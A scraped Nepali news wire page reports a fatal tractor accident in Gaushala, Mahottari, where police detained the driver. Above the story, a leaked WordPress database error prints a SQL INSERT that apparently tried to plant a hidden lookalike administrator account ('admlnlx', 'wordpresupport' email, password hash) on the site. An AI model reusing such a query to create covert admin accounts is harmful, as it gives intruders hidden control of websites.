WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BbUFabR69rUJCYoGLUk0OJHDbTwq4U1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 12:38:46', '', 'admlnlx', 'admlnlx')
गौशाला, माघ ३-
महोत्तरीको गौशाला नगरपालिका–७ हनुमानचोकमा आज ट्र्याक्टरले ठक्कर दिँदा एक पैदल यात्रुको मृत्यु भएको छ ।
मृत्यु हुनेमा जिल्लाको भरतपुर गाविस–४ का ५५ वर्षीय रामवृक्ष भगत रहेको इलाका प्रहरी कार्यालय गौशालाका प्रहरी निरीक्षक शम्भु पोखरेलले बताउनुभयो ।
ज १ त १९५१ नम्बरको ट्र्याक्टरले जिल्लाको मरहा खोलाबाट ढुङ्गा बोकी गौशाला बजारतिर आउँदै गर्दा गौशालाबाट आफ्नो घरतिर जाँदै गरेका भगतलाई गौशाला–७ स्थित हनुमान चोकमा ठक्कर दिँदा उनको घटनास्थलमै मृत्यु भएको प्रहरी निरीक्षक पोखरेलले बताउनुभयो ।
मृतक भगतको शव परीक्षणका लागि जिल्ला अस्पताल जलेश्वरमा लगिएको छ भने उनलाई ठक्कर दिने ट्र्याक्टर र चालक गौशाला–११ बस्ने ३६ वर्षीय जीतेन्द्र चौधरीलाई प्रहरीले नियन्त्रणमा लिएको इलाका प्रहरी कार्यालय गौशालाले जनाएको छ ।- रासस